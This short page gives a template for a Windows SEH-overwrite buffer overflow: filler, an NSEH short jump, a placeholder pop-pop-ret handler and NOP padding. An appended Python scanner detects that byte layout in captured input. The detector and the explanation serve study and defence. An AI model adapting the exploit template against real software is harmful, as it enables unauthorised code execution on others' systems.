Exploit Form:
from pwn import p32  # pwntools: pack a 32-bit little-endian value
buffer = b"A"*400
buffer += p32(0x06eb9090) # NSEH, short jump to get over SEH
buffer += p32(...) # SEH, pop pop ret
buffer += b"\x90"*(600-len(buffer))
Overwrite SEH with pop pop ret and place a short jump in NSEH to get over the SEH pointer.
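A defensive counterpart, added here and not part of the original page: a heuristic scanner that flags this record layout (NOP-padded short jump in NSEH, 4-byte handler pointer, NOP run) in captured input such as a crashing file or request body. The function name, the sample buffer and the handler value 0x10203040 are constructed for illustration.

```python
import struct

NOP, JMP_SHORT = 0x90, 0xEB

def find_seh_overwrite_records(data: bytes, min_sled: int = 8):
    """Return (offset, jump_distance, handler_value) for every 8-byte span that
    looks like an overwritten SEH record: NOP-padded `jmp short` in NSEH,
    a 4-byte handler pointer, then at least `min_sled` NOP bytes."""
    hits = []
    for off in range(len(data) - 8 - min_sled + 1):
        nseh = data[off:off + 4]
        # Two paddings are accepted: 90 90 EB xx (as on this page) and EB xx 90 90.
        if nseh[0] == NOP and nseh[1] == NOP and nseh[2] == JMP_SHORT:
            jmp_end, dist = off + 4, nseh[3]
        elif nseh[0] == JMP_SHORT and nseh[2] == NOP and nseh[3] == NOP:
            jmp_end, dist = off + 2, nseh[1]
        else:
            continue
        # rel8 is signed: 0x80..0xFF jumps backwards, which is a different layout.
        if dist >= 0x80:
            continue
        # The jump has to land past the 4-byte handler pointer.
        if jmp_end + dist < off + 8:
            continue
        if data[off + 8:off + 8 + min_sled] != bytes([NOP]) * min_sled:
            continue
        handler = struct.unpack_from("<I", data, off + 4)[0]
        hits.append((off, dist, handler))
    return hits

# Constructed sample with the page's layout; 0x10203040 is a placeholder value.
SAMPLE = b"A" * 400 + struct.pack("<I", 0x06EB9090) + struct.pack("<I", 0x10203040)
SAMPLE += b"\x90" * (600 - len(SAMPLE))

if __name__ == "__main__":
    for off, dist, handler in find_seh_overwrite_records(SAMPLE):
        print(f"offset {off}: jmp short +{dist}, handler value 0x{handler:08x}")
```

A hit is a lead, not proof: the same byte pattern can occur in benign binary data, so correlate it with a crash or an exception-dispatch event on the receiving process.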